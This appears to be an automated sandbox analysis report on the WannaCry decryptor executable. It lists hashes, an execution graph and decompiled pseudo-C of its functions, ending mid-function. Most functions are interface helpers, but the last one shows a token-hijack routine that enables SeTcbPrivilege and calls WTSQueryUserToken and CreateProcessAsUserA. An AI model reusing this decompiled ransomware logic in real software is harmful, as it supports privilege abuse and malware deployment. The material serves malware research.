                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14);
						L00412C98();
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}








                                                      0x00412a01
                                                      0x00412a07
                                                      0x00412a18
                                                      0x00412a27
                                                      0x00412a27
                                                      0x00412a33
                                                      0x00412a38
                                                      0x00412a3a
                                                      0x00412a42
                                                      0x00412a44
                                                      0x00412a45
                                                      0x00412a4a
                                                      0x00412a4a
                                                      0x00412a4d
                                                      0x00412a53
                                                      0x00412a5f
                                                      0x00412a61
                                                      0x00412a62
                                                      0x00412a67
                                                      0x00412a67
                                                      0x00412a6a
                                                      0x00412a6b
                                                      0x00412a75
                                                      0x00412a7a
                                                      0x00412a7a
                                                      0x00412a7d
                                                      0x00412a7e
                                                      0x00412a8d
                                                      0x00412a1a
                                                      0x00412a20
                                                      0x00412a25
                                                      0x00412a25
                                                      0x00412a09
                                                      0x00412a0f
                                                      0x00412a14
                                                      0x00412a14

                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}










                                                      0x00404434
                                                      0x00404436
                                                      0x0040443b
                                                      0x00404480
                                                      0x00404484
                                                      0x00404484
                                                      0x00404497
                                                      0x0040449e
                                                      0x00404499
                                                      0x00404499
                                                      0x00404499
                                                      0x004044a2
                                                      0x004044aa
                                                      0x004044b3
                                                      0x0040443d
                                                      0x0040443f
                                                      0x00404447
                                                      0x0040444f
                                                      0x00404452
                                                      0x00404449
                                                      0x00404449
                                                      0x00404449
                                                      0x0040445a
                                                      0x00404463
                                                      0x0040446b
                                                      0x0040446f
                                                      0x00404478
                                                      0x00404478

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}











                                                      0x00404cf0
                                                      0x00404cf2
                                                      0x00404cf7
                                                      0x00404cfd
                                                      0x00404cfe
                                                      0x00404d0c
                                                      0x00404d10
                                                      0x00404d18
                                                      0x00404d1b
                                                      0x00404d1f
                                                      0x00404d27
                                                      0x00404d2c
                                                      0x00404d31
                                                      0x00404d37
                                                      0x00404d3a
                                                      0x00404d3e
                                                      0x00404d46
                                                      0x00404d4b
                                                      0x00404d53
                                                      0x00404d59
                                                      0x00404d5e
                                                      0x00404d65
                                                      0x00404d6d
                                                      0x00404d78
                                                      0x00404d82

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                                      0x00404170
                                                      0x00404172
                                                      0x00404177
                                                      0x0040417d
                                                      0x0040417e
                                                      0x0040418c
                                                      0x00404190
                                                      0x00404196
                                                      0x0040419e
                                                      0x004041a1
                                                      0x004041a5
                                                      0x004041ad
                                                      0x004041b2
                                                      0x004041ba
                                                      0x004041c0
                                                      0x004041c5
                                                      0x004041cd
                                                      0x004041d2
                                                      0x004041d9
                                                      0x004041e1
                                                      0x004041ec
                                                      0x004041f6

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                                      0x00402e00
                                                      0x00402e06
                                                      0x00402e0e
                                                      0x00402e7a
                                                      0x00402e7a
                                                      0x00402e7e
                                                      0x00402e82
                                                      0x00402e10
                                                      0x00402e14
                                                      0x00402e14
                                                      0x00402e16
                                                      0x00402e1d
                                                      0x00402e24
                                                      0x00402e27
                                                      0x00402e2c
                                                      0x00402e2e
                                                      0x00402e33
                                                      0x00402e43
                                                      0x00402e44
                                                      0x00402e49
                                                      0x00402e39
                                                      0x00402e3b
                                                      0x00402e3b
                                                      0x00402e33
                                                      0x00402e4c
                                                      0x00402e4d
                                                      0x00402e50
                                                      0x00402e53
                                                      0x00402e56
                                                      0x00402e62
                                                      0x00402e68
                                                      0x00402e68
                                                      0x00402e6d
                                                      0x00402e73
                                                      0x00402e77
                                                      0x00402e77

                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 9c0cb0aced43a296d20ff8ffc4d70ac1f7ba505f3886b3a42eb6c6f4aca8c5be
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                                      0x00407650
                                                      0x0040765c
                                                      0x00407675
                                                      0x00407677
                                                      0x0040767f
                                                      0x00407688
                                                      0x0040768d
                                                      0x0040767f
                                                      0x00407692
                                                      0x00407698
                                                      0x0040765e
                                                      0x00407660
                                                      0x00407667
                                                      0x0040766d
                                                      0x0040766d

                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:83.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:56.6%
                                                      Total number of Nodes:53
                                                      Total number of Limit Nodes:2
                                                      execution_graph 115 40154c __set_app_type __p__fmode __p__commode 116 4015bb 115->116 117 4015c3 __setusermatherr 116->117 118 4015cf 116->118 117->118 127 4016b6 _controlfp 118->127 120 4015d4 _initterm __getmainargs _initterm 121 401628 GetStartupInfoA 120->121 123 40165c GetModuleHandleA 121->123 128 401510 __p___argc 123->128 126 401680 exit _XcptFilter 127->120 129 401520 __p___argv 128->129 130 40151b 128->130 133 401420 LoadLibraryA 129->133 130->126 132 401531 132->126 134 401449 GetProcAddress 133->134 135 40143e 133->135 136 401468 GetProcAddress 134->136 137 40145d 134->137 135->132 138 40147a 136->138 141 401485 136->141 137->132 138->132 139 4014a3 139->132 141->139 142 4014e1 Sleep 141->142 143 401000 GetModuleHandleA 141->143 142->139 142->141 144 401064 LoadLibraryA 143->144 145 401079 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 143->145 144->145 146 401405 144->146 145->146 147 4010c2 145->147 146->141 147->146 148 4010e8 GetModuleHandleA 147->148 149 4010f9 LoadLibraryA 148->149 150 40110e GetProcAddress GetProcAddress GetProcAddress 148->150 149->146 149->150 150->146 151 401138 150->151 151->146 152 401149 GetModuleHandleA 151->152 153 40115a LoadLibraryA 152->153 154 40116f GetProcAddress GetProcAddress 152->154 153->146 153->154 154->146 155 40118e 154->155 155->146 156 401196 GetModuleHandleA 155->156 157 4011a5 LoadLibraryA 156->157 158 4011b8 GetProcAddress 156->158 157->146 157->158 158->146 159 4011ca 158->159 160 4011e2 LookupPrivilegeValueA 159->160 161 4011f9 _local_unwind2 159->161 160->161 163 401204 AdjustTokenPrivileges 160->163 161->146 163->161 164 401275 163->164 165 40128b _local_unwind2 164->165 166 4012ab 164->166 165->141 166->161 167 401366 166->167 168 401377 167->168 169 40136b WaitForSingleObject 167->169 172 401398 168->172 169->168 173 40139f 172->173 174 4013e0 AdjustTokenPrivileges 173->174 175 401383 173->175 174->175 175->141 176 40169e _exit

                                                      Callgraph

                                                      Executed Functions

                                                      Function 00401000 Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 294libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 48%
                                                      			E00401000(intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
				int _v8;
				char _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				signed int _v56;
				int _v60;
				_Unknown_base(*)()* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct _TOKEN_PRIVILEGES _v84;
				signed int _v88;
				_Unknown_base(*)()* _v92;
				_Unknown_base(*)()* _v96;
				_Unknown_base(*)()* _v100;
				_Unknown_base(*)()* _v108;
				signed int _v112;
				char _v116;
				char _v120;
				_Unknown_base(*)()* _v124;
				_Unknown_base(*)()* _v136;
				char _v140;
				struct _LUID _v148;
				long _v152;
				intOrPtr _v156;
				short _v176;
				CHAR* _v216;
				void _v220;
				char _v224;
				long _v228;
				long _v232;
				struct _TOKEN_PRIVILEGES _v240;
				void* __ebx;
				void* __ebp;
				signed int _t94;
				struct HINSTANCE__* _t101;
				intOrPtr _t107;
				struct HINSTANCE__* _t158;
				struct HINSTANCE__* _t160;
				struct HINSTANCE__* _t161;
				signed int _t162;
				intOrPtr _t165;
				void* _t166;

				_push(0xffffffff);
				_push(0x402060);
				_push(0x401540);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t165;
				_t166 = _t165 - 0xdc;
				_v60 = 0;
				_v84.PrivilegeCount = 0;
				_v84.Privileges = 0;
				_v76 = 0;
				_v72 = 0;
				_v140 = 0;
				_v120 = 0;
				_v116 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t158 = GetModuleHandleA("advapi32.dll");
				if(_t158 != 0) {
					L2:
					_v68 = GetProcAddress(_t158, "OpenProcessToken");
					_v136 = GetProcAddress(_t158, "LookupPrivilegeValueA");
					_v108 = GetProcAddress(_t158, "AdjustTokenPrivileges");
					_v100 = GetProcAddress(_t158, "DuplicateTokenEx");
					_t94 = GetProcAddress(_t158, "CreateProcessAsUserA");
					_v88 = _t94;
					if(_v68 == 0 || _v136 == 0 || _v108 == 0 || _v100 == 0 || _t94 == 0) {
						goto L39;
					} else {
						_t160 = GetModuleHandleA("kernel32.dll");
						if(_t160 != 0) {
							L9:
							_v96 = GetProcAddress(_t160, "WTSGetActiveConsoleSessionId");
							_v92 = GetProcAddress(_t160, "GetCurrentProcess");
							_t94 = GetProcAddress(_t160, "CloseHandle");
							_v56 = _t94;
							if(_v96 == 0 || _v92 == 0 || _t94 == 0) {
								goto L39;
							} else {
								_t161 = GetModuleHandleA("userenv.dll");
								if(_t161 != 0) {
									L14:
									_v124 = GetProcAddress(_t161, "CreateEnvironmentBlock");
									_t94 = GetProcAddress(_t161, "DestroyEnvironmentBlock");
									_v112 = _t94;
									if(_v124 == 0 || _t94 == 0) {
										goto L39;
									} else {
										_t101 = GetModuleHandleA("wtsapi32.dll");
										if(_t101 != 0) {
											L18:
											_t94 = GetProcAddress(_t101, "WTSQueryUserToken");
											_t162 = _t94;
											if(_t162 == 0) {
												goto L39;
											} else {
												_v8 = 0;
												_push(_v92(0x28,  &_v60));
												if(_v68() == 0) {
													L37:
													_push(0xffffffff);
													_t94 =  &_v20;
													_push(_t94);
													goto L38;
												} else {
													_t94 = LookupPrivilegeValueA(0, "SeTcbPrivilege",  &_v148);
													if(_t94 != 0) {
														_v240.PrivilegeCount = 0;
														_v240.Privileges = 0;
														_v232 = 0;
														_v228 = 0;
														_v240.PrivilegeCount = 1;
														_v240.Privileges = _v148.LowPart;
														_v232 = _v148.HighPart;
														_v228 = 2;
														_t94 = AdjustTokenPrivileges(_v60, 0,  &_v240, 0x10,  &_v84,  &_v152);
														if(_t94 != 0) {
															_t107 = _a8;
															if(_t107 != 0xffffffff) {
																_v156 = _t107;
																goto L28;
															} else {
																_t107 = _v96();
																_v156 = _t107;
																if(_t107 != 0xffffffff) {
																	L28:
																	_t94 =  *_t162(_t107,  &_v140); // executed
																	if(_t94 != 0) {
																		_t94 = _v100(_v140, 0x2000000, 0, 1, 1,  &_v120);
																		if(_t94 != 0) {
																			_v224 = 0;
																			memset( &_v220, 0, 0x10 << 2);
																			_t166 = _t166 + 0xc;
																			_v224 = 0x44;
